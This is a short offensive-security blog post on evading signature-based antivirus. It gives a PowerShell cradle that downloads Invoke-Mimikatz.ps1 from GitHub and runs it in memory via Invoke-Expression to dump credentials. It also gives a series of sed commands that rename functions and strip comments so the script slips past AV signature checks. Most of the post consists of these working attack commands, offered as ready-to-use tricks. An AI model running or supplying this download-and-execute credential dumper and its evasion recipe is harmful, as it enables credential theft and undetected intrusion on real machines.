This post is a simple shout out to a blog post I enjoyed reading and that proves a point I have repeated endlessly throughout Hack like a Pornstar & Hack a Fashion Brand: AV products that rely on signatures (that’s almost all of them) can be trivially bypassed!

If you recall, when executing PowerShell scripts on targets, we used the awesome Invoke-Expression commandlet, something along the lines of:

$browser = New-Object System.Net.WebClient
$browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials
mimi= $browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
Invoke-Expression(mimi)
Invoke-Mimikatz

The script Invoke-Mimikatz.ps1 was run directly in memory. No file on disk, no Antivirus alert.
However, more and more AV vendors are talking about monitoring in memory activity. Monitoring is a big word really, most of the time they simply look for known strings or keywords. A few perform real behavioral analysis but even that can be bypassed – we will talk about it in a future post.

How to avoid being detected then? a couple of simple tricks :

• Removing any mention of Mimikatz in the file
• Removing comments
• Renaming some function names

That’s it really… The guys at BlackHills gave us this simple bash script to do the job efficiently! Thanks guys !

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 
Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions 
\$Win32Functions #\-/g" Invoke-Mimikatz.ps1